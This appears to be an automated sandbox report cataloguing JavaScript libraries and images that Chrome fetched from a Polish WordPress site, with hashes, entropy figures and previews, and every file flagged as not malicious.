                                                            URL:https://canpol.poznan.pl/wp-includes/js/comment-reply.min.js?ver=5.8
                                                            Preview:/*! This file is auto-generated */.window.addComment=function(v){var I,C,h,E=v.document,b={commentReplyClass:"comment-reply-link",commentReplyTitleId:"reply-title",cancelReplyId:"cancel-comment-reply-link",commentFormId:"commentform",temporaryFormId:"wp-temp-form-div",parentIdFieldId:"comment_parent",postIdFieldId:"comment_post_ID"},e=v.MutationObserver||v.WebKitMutationObserver||v.MozMutationObserver,r="querySelector"in E&&"addEventListener"in v,n=!!E.documentElement.dataset;function t(){d(),e&&new e(o).observe(E.body,{childList:!0,subtree:!0})}function d(e){if(r&&(I=g(b.cancelReplyId),C=g(b.commentFormId),I)){I.addEventListener("touchstart",l),I.addEventListener("click",l);var t=function(e){if((e.metaKey||e.ctrlKey)&&13===e.keyCode)return C.removeEventListener("keydown",t),e.preventDefault(),C.submit.click(),!1};C&&C.addEventListener("keydown",t);for(var n,d=function(e){var t=b.commentReplyClass;e&&e.childNodes||(e=E);t=E.getElementsByClassName?e.getElementsByClassName(t):e.querySele
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (8668)
                                                            Category:dropped
                                                            Size (bytes):529170
                                                            Entropy (8bit):5.2736450153812475
                                                            Encrypted:false
                                                            SSDEEP:3072:TyBHHWzNxopi7eSeVVaHKxgXARzSHLrKu2n951ETelxNWErOE+Z1FdLZF:upK7eSyA9LrKu6951ETmWErOE+Z1rLD
                                                            MD5:D513B49D6FB2092715041E3ECF517747
                                                            SHA1:C9B9CDE3AEB92B013277CCFAAE26EBDFF96C54E0
                                                            SHA-256:0F91DF80A224C25119D66899C612770207F295B39C1D18BC77314B252B87A0B7
                                                            SHA-512:17BDFEC6CE00151ECD5DFF89BD615F41475DCD79D3DFEF46613F4B83304F0D606A71E11FA6CF15B370F41E44B388BDFE7935A88E4F7DBA5E3B779A382F0B26AD
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:/*-------------------------------------------------------------------------...1..Plugin Init..2..Helper Functions..3..Shortcode Stuff..4..Header + Search..5..Page Specific..6. Scroll to top ..7..Cross Browser Fixes...-------------------------------------------------------------------------*/.../*-------------------------------------------------------------------------*/./*.1..Plugin Init./*-------------------------------------------------------------------------*/../*!. * imagesLoaded PACKAGED v3.1.1. * JavaScript is all like "You images are done yet or what?". * MIT License. */..(function(){function e(){}function t(e,t){for(var n=e.length;n--;)if(e[n].listener===t)return n;return-1}function n(e){return function(){return this[e].apply(this,arguments)}}var i=e.prototype,r=this,o=r.EventEmitter;i.getListeners=function(e){var t,n,i=this._getEvents();if("object"==typeof e){t={};for(n in i)i.hasOwnProperty(n)&&e.test(n)&&(t[n]=i[n])}else t=i[e]||(i[e]=[]);return t},i.flattenListeners=funct
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (21403)
                                                            Category:downloaded
                                                            Size (bytes):23625
                                                            Entropy (8bit):6.06683888807607
                                                            Encrypted:false
                                                            SSDEEP:384:87P7ie8trA99GHCtWfIYrOTXLEJGUMXpAaHaGV8PU+L5zLqbw2baeHJFVCVHvVP/:87P8trlHZ1YKGpXpAaHr8PLL5zLaw2F4
                                                            MD5:A6A1545DC2D59AAEE3D3BF0D905C586B
                                                            SHA1:37986F49F05C9FF734493320FF4DFFCE5970DBFA
                                                            SHA-256:9D29B72C598627A233C17C02F8D064F73984A22F3FCE2E47ABC90DD1A5662CEA
                                                            SHA-512:85309BDACAC76E90F7ECE6F28271AF97E88F1C59582D6D6AD86D0FCBCF6ED1EB6CEF9FE2661FE63BB7EFDFD96A8DEBE102D081183AD1B7BE6E276401E7E1E65F
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/jquery.infinitescroll.min.js?ver=20120206
                                                            Preview:/*!. --------------------------------. Infinite Scroll. --------------------------------. + https://github.com/paulirish/infinite-scroll. + version 2.1.0. + Copyright 2011/12 Paul Irish & Luke Shumard. + Licensed under the MIT license.. + Documentation: http://infinite-scroll.com/.*/.;(function(e){if(typeof define==="function"&&define.amd){define(["jquery"],e)}else{e(jQuery)}})(function(e,t){"use strict";e.infinitescroll=function(n,r,i){this.element=e(i);if(!this._create(n,r)){this.failed=true}};e.infinitescroll.defaults={loading:{finished:t,finishedMsg:"<em>Congratulations, you've reached the end of the internet.</em>",img:"data:image/gif;base64,R0lGODlh3AATAPQeAPDy+MnQ6LW/4N3h8MzT6rjC4sTM5r/I5NHX7N7j8c7U6tvg8OLl8uXo9Ojr9b3G5MfP6Ovu9tPZ7PT1+vX2+tbb7vf4+8/W69jd7rC73vn5/O/x+K243ai02////wAAACH/C05FVFNDQVBFMi4wAwEAAAAh+QQECgD/ACwAAAAA3AATAAAF/6AnjmRpnmiqrmzrvnAsz3Rt33iu73zv/8CgcEj0BAScpHLJbDqf0Kh0Sq1ar9isdioItAKGw+MAKYMFhbF63CW438f0mg1R2O8EuXj/aOPtaHx7fn96goR4hmuId4qDdX95c
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 220x220, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=12, height=1152, manufacturer=samsung, model=SM-N910C, orientation=upper-left, xresolution=175, yresolution=183, resolutionunit=2, software=Adobe Photoshop Elements 7.0 Windows, datetime=2017:09:08 14:18:04, width=2048], progressive, precision 8, 772x494, components 3
                                                            Category:downloaded
                                                            Size (bytes):514861
                                                            Entropy (8bit):7.979267787344127
                                                            Encrypted:false
                                                            SSDEEP:12288:OdidXz+XhOPa+qGdu3tWje7LYQsafVDYVvUDaOk:q+K7+qGdu9+jDN57
                                                            MD5:E9D0F1C3C8ABD93E12F7702A711CC265
                                                            SHA1:C3C839C2F1B14A0EAD16199FBF56ED105F4B0B7C
                                                            SHA-256:F43D9F3FBC507C0D939B2D0831203216573AD406BF97067E580048038B6CF817
                                                            SHA-512:2F7B46E1303DAFBA6525CEEEF0EA89B49EAB8FCA2886FE91796B26AC40C710C9A6A8BF9C959A5AF801ACB9DE556ED493ABA0204B33C1C124C0A50617062B42A3
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2017/09/PD-70200s.jpg
                                                            Preview:......JFIF............).Exif..II*...........................................................................................(...........1...%.......2.......................i...............samsung.SM-N910C...!..'....!..'..Adobe Photoshop Elements 7.0 Windows.2017:09:08 14:18:04...........*...........2..."...........'...................0220........:...........N...........b...........j...........r...........z.......................................................................0100.................................................................................... ...............................2016:12:15 10:27:02.2016:12:15 10:27:02.....d.......d...[...d...............d.......d........................H16LSHA00SM H16LSIG01SA................................................(...................&............&......H.......H.............JFIF.....H.H......Adobe_CM......Adobe.d.......................................................................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (8668)
                                                            Category:downloaded
                                                            Size (bytes):529170
                                                            Entropy (8bit):5.2736450153812475
                                                            Encrypted:false
                                                            SSDEEP:3072:TyBHHWzNxopi7eSeVVaHKxgXARzSHLrKu2n951ETelxNWErOE+Z1FdLZF:upK7eSyA9LrKu6951ETmWErOE+Z1rLD
                                                            MD5:D513B49D6FB2092715041E3ECF517747
                                                            SHA1:C9B9CDE3AEB92B013277CCFAAE26EBDFF96C54E0
                                                            SHA-256:0F91DF80A224C25119D66899C612770207F295B39C1D18BC77314B252B87A0B7
                                                            SHA-512:17BDFEC6CE00151ECD5DFF89BD615F41475DCD79D3DFEF46613F4B83304F0D606A71E11FA6CF15B370F41E44B388BDFE7935A88E4F7DBA5E3B779A382F0B26AD
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/themes/salient/js/init.js?ver=7.6
                                                            Preview:/*-------------------------------------------------------------------------...1..Plugin Init..2..Helper Functions..3..Shortcode Stuff..4..Header + Search..5..Page Specific..6. Scroll to top ..7..Cross Browser Fixes...-------------------------------------------------------------------------*/.../*-------------------------------------------------------------------------*/./*.1..Plugin Init./*-------------------------------------------------------------------------*/../*!. * imagesLoaded PACKAGED v3.1.1. * JavaScript is all like "You images are done yet or what?". * MIT License. */..(function(){function e(){}function t(e,t){for(var n=e.length;n--;)if(e[n].listener===t)return n;return-1}function n(e){return function(){return this[e].apply(this,arguments)}}var i=e.prototype,r=this,o=r.EventEmitter;i.getListeners=function(e){var t,n,i=this._getEvents();if("object"==typeof e){t={};for(n in i)i.hasOwnProperty(n)&&e.test(n)&&(t[n]=i[n])}else t=i[e]||(i[e]=[]);return t},i.flattenListeners=funct
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 432 x 240, 8-bit/color RGBA, interlaced
                                                            Category:downloaded
                                                            Size (bytes):73838
                                                            Entropy (8bit):7.992295347349307
                                                            Encrypted:true
                                                            SSDEEP:1536:snj+1vldwJBd5+Jq6ve+E3s4dnaTvbRNqGunrPPtyph:+j+19yvd5Yad0b+G+rPPtwh
                                                            MD5:7C0FA5FE104A05D3F26206FB80A69568
                                                            SHA1:3BA1927FBBD2035A3F1F6C061B371F26C210BC0A
                                                            SHA-256:A1F6C1BFC0EBE695AEBE62B8C0B951609BFB994C93EB2EC3F03B357C8EEA6658
                                                            SHA-512:6F27F7D3785A1A90B95E63CCFBE5AD87284955BCBEB28C6A6A872D2670E2326F2981166E3AE2D30915E49A48C666F02B6569BBD594EF2AF7A023E4639568F88F
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2016/04/logo_new2.png
                                                            Preview:.PNG........IHDR..............f.d....pHYs...&...&...%... .IDATx..].xTE..{:......."....HQ.A.. M.~.".RE."..(....X....A:........Nr...Bh.y..nn..3..9.....?..7......c.q.L..z\.5'...J..".v.p..s:..-}g..T*..h........2N..y....nW...q.Rt....5.T.RzLll..f..7.....{....j...SM.5;.ot0<##*.:..VDC....c>.Xj.~.b.~;..kN.:U.V.Z..z...<%.gl.._.t.SO?..?..xTTTFXXx.B!......;v.Boo.+.....m0.{o2...U...q.&.i..<......q.)...<.>|*...C....O]b.........[.N..=[....=.N...~..I......u...c....=.T;v<)1..F.qj.Z...o.3.v..2..5...vL&.qj...'9.V..gOo..HFFFB. .CBB....V;..j.....X.Ln..uv.BqM.f.{.2[jj.}.*.....G6.wn....a..\....j58.N....d2W.\%....j.N......@..M(..b.,`..1..N.....gy.o...[xxDvXXX..C.0.`.6...[...N..E:.S(T...y..-.}0x.`..n...n.5.. ...._f:......EFF^.wfff$.7"""..6..b.f.'.=.z..../...W.l.....o../......./\.P.....Q.F.;w.lN.Mf.R.4p.....X....+a........:4.].N..$&....o.....R.Z...8..~z.f....7.s...8.e....F....?...w..Q8.}....k......g....oM.'..:.b..7.-A;&'...d.9.}{.#..........:m..7..10.....4J...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):20890
                                                            Entropy (8bit):7.981249898270927
                                                            Encrypted:false
                                                            SSDEEP:384:Ig8I6x4MKitjbPa71+oHlw7xXNrEeZNVanadKBc3SmhT8MICSveyE5sA0u:nqx4Mra71+42xX6ACeAmhTtWnERj
                                                            MD5:7F0FAD6D7B966FEE04BD9C0D6FDC640E
                                                            SHA1:F720B973B2ED938B446D364C3DB3EB7B223E267C
                                                            SHA-256:8E30DB985F0D926C7555548A06E0C73E57484ABB3FDF23C829E7F83FEAFEB93A
                                                            SHA-512:C14A3B2EA12B6827410EB0FB36A521B59CB2235FE9A325640C7A312990167F3D88925AF32A67E5CBEE9CD9E9BEA532C3E0F177B55EDFF102A55E950008CBFC5C
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME......,.(v... .IDATx..w.eWu...'...V..bWWwu.. .Z.B(.$@..l$...8`.l...<.=.{<~3..<..``...$P@..PKju...+u.p..p...VUWG...~>......9.w.Z{..A".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H^.B6.[..8Z>...........b..2M.+[...Y.0.@.P4.}...|S.a....^.)=.N.........@ @ .....r.0.C6..R.D.X$..N.I....C555......B.e+I.zW.....7zzz>.....p...*.0.!...H&.d2.\cc......K...s......<y..@ .H$....`}....N..[[[....._.]...n.+...'..,....F<..l.. ..<...h..Bkk.5B..l.)X.D...m..8p..x<...........0....K...RQ..B.G....w.X..|....>.o..-.J.J2mm.>|8.h./z<.....l.)Xo.X.r.O.?~.;..-.e.J2.R............K........,k..../_..-.Jr1..wo~....UU= .C)Xo.`.w...p.....".(.l.#G.....F!DJ..kC.M...}.......+.....H$...G.>.8.[.....R.....?.,ku"..."yE$..,.Z=::....h.E.`.U...........WEKK......8NH.....B.....oE..t.%..5.F......q.G.-"..M..h....MMM.1$....&...n.m;*
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):43499
                                                            Entropy (8bit):7.982857357893048
                                                            Encrypted:false
                                                            SSDEEP:768:sQHz2KKIJ5DrK4fyYPWwcYsgHlsJPzaLSWMlZRk2Vnp89gh7Vz4Ff:LKIrKcyYPxcYlaaeWMzRVn0g5V4Ff
                                                            MD5:DF1E885C31F85EC9B4A5492D0286CFAF
                                                            SHA1:A70D66464162C4652920696C4D36C73DE40CE372
                                                            SHA-256:38EE1BA354511EB971BF06405C36E8C8B0C9D3E96A2C0ABC9221F6A22AA8AF31
                                                            SHA-512:828C5DC93DD25295D26A0BD82A7D9AFEB31E059C2D3F76F8EBDBF55677C61E22C85A3B4BBB20FBBE21D94D8FDF370A79751320D636DD432743B34734D76739C5
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME.....44.... .IDATx..Y.e.}...og.k...z.H....T,.-..u........<$.C..d....9/Y..!......g........ZHJ.d.....~...K..m....b..v>@..........................................................................................................................................................................................?..Y.......?....:..+..o.m5+..c."..Y..}{}}...4....Y.F.......f........Ow.]....N.8....Y....eIQ...sf............Y...GB..Y.F..J..p8.o.=z..v............5....x.|>_^.|..X__..F....+..-.....{.U......4V....k....l6.q....n....]l..X%w......._.L.....".2vww.Z....?/..Ui../.P...3o.....\.0...n..o0.........../K)..B.fU...."V*....[..s.=.j...'..[...=...i...!\.*.`....r...n...=..s..U5|..,.u.V...O.'.V..lD....P7.9...^{...g.F..~.h}.;..^|../*..l..F.......+..>..v..,H..e.X..;.L_z..B.i.".6d...f.J.}..?...i..O..n....{..w. ..4+....)V.....:.^...i...Gbgg.......e.A7+....%X.;w...k.5.....k.q..."..oV....C.......
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 200x200, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, height=2313, bps=146, orientation=upper-left, width=1831], baseline, precision 8, 500x500, components 3
                                                            Category:downloaded
                                                            Size (bytes):61388
                                                            Entropy (8bit):7.972584845251485
                                                            Encrypted:false
                                                            SSDEEP:1536:izcWUnpxroZMPXSByu6kyXOdlyxxA/XiKZM/Ikih0:lxpPXy4OdEeyKI7
                                                            MD5:F752EE7C0A87F7DA4B6CF67261D0D9E2
                                                            SHA1:2A77DC845B3FB1FDA01A616BD987502D5DAA4297
                                                            SHA-256:6F9C1E59A1F93796F8A0620F533FCFCAAB65177DBACA464ADFB3E62B480CA533
                                                            SHA-512:8CE403BD2CCE02DF217F5051B9785528B930362967343337B442075811A26B9CD0100BD6096F23BB1589B5BA3DA6FAF1DF018CC3DADC24FA414DCCD12D139A98
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2018/10/disneysamoprzylepne-500x500.jpg
                                                            Preview:......JFIF.............jExif..II*...............'...........................................................................(...........1...........2...........i.....................................Adobe Photoshop CC (Macintosh)..2018:10:09 16:08:43...........0221....................V...........!.............................`...........h...(...................p.........................................JFIF.....^.^.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......t...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (8752)
                                                            Category:downloaded
                                                            Size (bytes):8869
                                                            Entropy (8bit):5.258349832137265
                                                            Encrypted:false
                                                            SSDEEP:192:bwlC7Gd4QY6Pm+OrOJ42uVOpDsu1mx3AJzE8iOYFfycBmSCc:beC7Gd4QPm+Or0WOpou1mxQlEzOYFd
                                                            MD5:B1D092D72FDD1DA14095576BE8B65036
                                                            SHA1:4318FA6BF409BF14835F44252900E6BC0CF40AF8
                                                            SHA-256:13ACF7693956ABA0A79DE99BBCABE8A407AAE283AB8A258196D7E2ABFC28E07F
                                                            SHA-512:0BBA333A38355A6E6910EFBA1C3E48344210456913BC55EC14F022E120771DF1B2A2ADB13F60E37AFFAB42DD1A29647DA8F67B7AF0C0C44109A7E3FD03BCA864
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/imagesloaded.pkgd.min.js?ver=20120206
                                                            Preview:/*!. * imagesLoaded PACKAGED v3.1.8. * JavaScript is all like "You images are done yet or what?". * MIT License. */..(function(){function e(){}function t(e,t){for(var n=e.length;n--;)if(e[n].listener===t)return n;return-1}function n(e){return function(){return this[e].apply(this,arguments)}}var i=e.prototype,r=this,o=r.EventEmitter;i.getListeners=function(e){var t,n,i=this._getEvents();if("object"==typeof e){t={};for(n in i)i.hasOwnProperty(n)&&e.test(n)&&(t[n]=i[n])}else t=i[e]||(i[e]=[]);return t},i.flattenListeners=function(e){var t,n=[];for(t=0;e.length>t;t+=1)n.push(e[t].listener);return n},i.getListenersAsObject=function(e){var t,n=this.getListeners(e);return n instanceof Array&&(t={},t[e]=n),t||n},i.addListener=function(e,n){var i,r=this.getListenersAsObject(e),o="object"==typeof n;for(i in r)r.hasOwnProperty(i)&&-1===t(r[i],n)&&r[i].push(o?n:{listener:n,once:!1});return this},i.on=n("addListener"),i.addOnceListener=function(e,t){return this.addListener(e,{listener:t,once:!0})},
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 350x350, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=15, description=OLYMPUS DIGITAL CAMERA , manufacturer=OLYMPUS IMAGING CORP. , model=E-M1 , orientation=upper-left, xresolution=267, yresolution=275, resolutionunit=2, software=Adobe Photoshop 7.0 CE, datetime=2018:07:26 12:41:51], progressive, precision 8, 447x386, components 3
                                                            Category:dropped
                                                            Size (bytes):98996
                                                            Entropy (8bit):7.822491069715387
                                                            Encrypted:false
                                                            SSDEEP:1536:tPwXPw4/krhzPAFNQa5N5SY+H6VwFFbA48PQKuMDZgCFZSkPFGZ/rj:WaR4FNQwNC+wF+xoycGFY/rj
                                                            MD5:FB7B8648A85ECAB33A1F0D9EDB48DA80
                                                            SHA1:1DD2252E7028E1DAE8126843984A068595B180BC
                                                            SHA-256:CE5512B1DAA5BED5CB1A8C17F4E2700BF06B58D5BD4631E40AC9B25C4020EFE4
                                                            SHA-512:3C7227D779A08231F292C121027E680D268D3E50CF0A49A37A10D360DD98061D35C38463EB1D1BC1F4DB3E355C79C118FFC1AD26BD167D423B23644419A69DE5
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......JFIF.....^.^......Exif..II*........... ...................................................................(...........1...........2.......2...;...@...F...................@...................i...........%...........$...OLYMPUS DIGITAL CAMERA .OLYMPUS IMAGING CORP. .E-M1 .^.......^.......Adobe Photoshop 7.0 CE.2018:07:26 12:41:51.................................................................................................................................PrintIM.0300..%.............................................8.................P.....`... ..................................................................................................... ......................................................'.......'.......'.......'.......'..^....'.......'.......'.......'....................................................................................................................................@@........@@........@@............@@........@@........@@..................
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1920x1280, components 3
                                                            Category:downloaded
                                                            Size (bytes):324523
                                                            Entropy (8bit):7.9487054098291825
                                                            Encrypted:false
                                                            SSDEEP:6144:OW2c/YXsfNzV46YJ5zCz+aC9gYJXMA0Eb9l0lhBeGE:OW2tXs1x4V5zIS9BJXMKP0l3eGE
                                                            MD5:292309ED225056871E7DC4E79158FCE0
                                                            SHA1:8D93E98612F151EF6340F9D59A62D46335604229
                                                            SHA-256:DEF58744C7E09378E113C920715AC2A7B393BF164EE9720A15AB2F7AF6AAEAE1
                                                            SHA-512:B39BB83B0B109DA9B3C5B77679652F9B226C4201B739294399F6DFFE0839ED6F955D6D18892D4CE3B1AAB8DA15BE24C7AD5ABEDAFF70C96CCD364829A21174C7
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/uploads/2016/08/gift-553158_1920.jpg
                                                            Preview:......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..]d.J....%lw.U......../.J.d...5|..H.<...L....52K...*..R..-....@x.j.d.E...W...T......)..+.....>i4.h...xrx9.U.9".V.V!...zf..8.5X9..jE5<..X.sN.H.*.l..<7..5aX....g.j.......bp.w..7......4.&N....z..|R.r?...?.;}B....N...`.0zp.C..d...y..Y.....9..A..p98..*..C{.Y.O...a.....j I.4.i..C.J..........L..h.Q.I..J..w4n4..j\..<.3.h=.z.&..)C{.7Q.,.$..Z...f.,M...85F.<R.R.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 300 x 225, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):25891
                                                            Entropy (8bit):7.983470845089535
                                                            Encrypted:false
                                                            SSDEEP:384:Ij8KuxibkSnCOoa69Mjpbv138OBW57to+XGYgmFQJMwqo9zCoih+/iWc08ZbbJI/:ljYCvw138OBmO1aQ6I1Chh+sZGFZMQ
                                                            MD5:96255458FA04C4E1C67735FD3D940130
                                                            SHA1:3E88CE2CF8EE9188F64C5F942293F215FC428585
                                                            SHA-256:700B3DD6319830572E602131C4CDD681CF3E037D0C2870140DB85E099CF87656
                                                            SHA-512:41F19FAE771B8C594431A24FFFFE8A05493084751D928FF55AD5CD1E396EF7E9DA351B2D113FC1B8A4B4D3A6C7B63D24B324C794FCCAA974CBD61CD9B932A340
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...,.........r|......bKGD..............pHYs...#...#.x.?v....tIME......9.... .IDATx..w.\.u......UY.P.@.a....w."E..9#;...5..D....h#v....b$..Gn..XI....)z.d{.F.6.B.(T........#.....f7I....QU....w.._.s..B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P(...B.P.....?Z..F.Z...l...bq.m.)..g~.1M.lYV1.H.knn.N$..OB.O......H..b...>...v%......x.P(.eY..n.....mJ...b.b.H:.>.....D"..B.W.....Z......~9.HD..4---.c>D......(.J....nnn.WJ..`.vn_.\......+.H4e2.eE.#.....(..........D..J.n..._.|.9......%...N.GD.Zezz..0^...zT.QS....'Q.D..[.9.ZWWWS{{....,--1??..{.}....!...%X?)b.W...:22.w...UV.b.........H..!|.+J.~.bU.T~....e....U)..q.FFF.-[..O.h.o.h)........:q...={...X).N.N.:U...=...Q.....`%..;6.}..d,.S..x[..2../.8p.W.QP=...T..g.....>..d.X)~ .X.L&....}NJ.V=...G)V.....}..&.Q..xGd2.|.....K)..#J.~T......7....3..........2.zC..B..+W..QsssB......677'&''.XJi..Q.....A....g...Tg(..}}}
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:downloaded
                                                            Size (bytes):383
                                                            Entropy (8bit):4.992105234988886
                                                            Encrypted:false
                                                            SSDEEP:6:UoPS47MxFFPfHaLgEO14Zou+LfJemXsCPvX9IiV4TUu3uRFh4tSHug3RIT8n:UoPB76n914ZbEBeveWJN+6ghC8
                                                            MD5:2C92C459B0F7FB738470A2C44DE47435
                                                            SHA1:9749B071CE82865C8238FBF4AFD06362F42088E6
                                                            SHA-256:16AE7959EFC9A0EBD0BA0E8AEF791DF0D76D4119E560C3E9EA77B53BD8098A3D
                                                            SHA-512:0946FF6C236A48C670739A4E3570813B1B17479D55B4B390EAE54896D6C47A5A1348B7ED0D72EBEE6C025138EBF5D65BE8E17F0971A0FA295C09D7B3B4247069
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://canpol.poznan.pl/wp-content/plugins/fancy-box/jquery.fancybox.js?ver=1.2.6
                                                            Preview:/*. * FancyBox - jQuery Plugin. * simple and fancy lightbox alternative. *. * Copyright (c) 2009 Janis Skarnelis. * Examples and documentation at: http://fancybox.net. * . * Version: 1.2.6 (16/11/2009). * Requires: jQuery v1.3+. * . * Dual licensed under the MIT and GPL licenses:. * http://www.opensource.org/licenses/mit-license.php. * http://www.gnu.org/licenses/gpl.html. */.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 592 x 254, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):6868
                                                            Entropy (8bit):7.875096151329066
                                                            Encrypted:false
                                                            SSDEEP:96:VZ/I09Da01l+gmkyTt6Hk8nT/LXU4+7A8ZDR8Cv7uTJNUDihA3PnM/AirhNnc8Zg:VS0tKg9E05TY4+vHHfM/AilNFUh
                                                            MD5:AF8BB375CB9DD7C49A3DE7B7375E6CF5
                                                            SHA1:52CEB3DB135A44ED13F1BD1956803B336F52C778
                                                            SHA-256:7D8254BF11C02A7278B2A6D97737A257F1D3A86351858C8627EBA4AF12743753
                                                            SHA-512:7C4B8FF1B3839D615B357D94C5A05D38F6060BF4EFE1BDF5DED6AC43FF32FF4DA107250DD0A5482A352E9E8C67A135155AF3D29183B6CA9EACE609550E29D150
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.PNG........IHDR...P..........k;.....pHYs...#...#.x.?v...OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 200x200, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, height=2313, bps=146, orientation=upper-left, width=1831], baseline, precision 8, 500x500, components 3
                                                            Category:dropped
                                                            Size (bytes):61388
                                                            Entropy (8bit):7.972584845251485
                                                            Encrypted:false
                                                            SSDEEP:1536:izcWUnpxroZMPXSByu6kyXOdlyxxA/XiKZM/Ikih0:lxpPXy4OdEeyKI7
                                                            MD5:F752EE7C0A87F7DA4B6CF67261D0D9E2
                                                            SHA1:2A77DC845B3FB1FDA01A616BD987502D5DAA4297
                                                            SHA-256:6F9C1E59A1F93796F8A0620F533FCFCAAB65177DBACA464ADFB3E62B480CA533
                                                            SHA-512:8CE403BD2CCE02DF217F5051B9785528B930362967343337B442075811A26B9CD0100BD6096F23BB1589B5BA3DA6FAF1DF018CC3DADC24FA414DCCD12D139A98
                                                            Malicious:false
                                                            Reputation:low
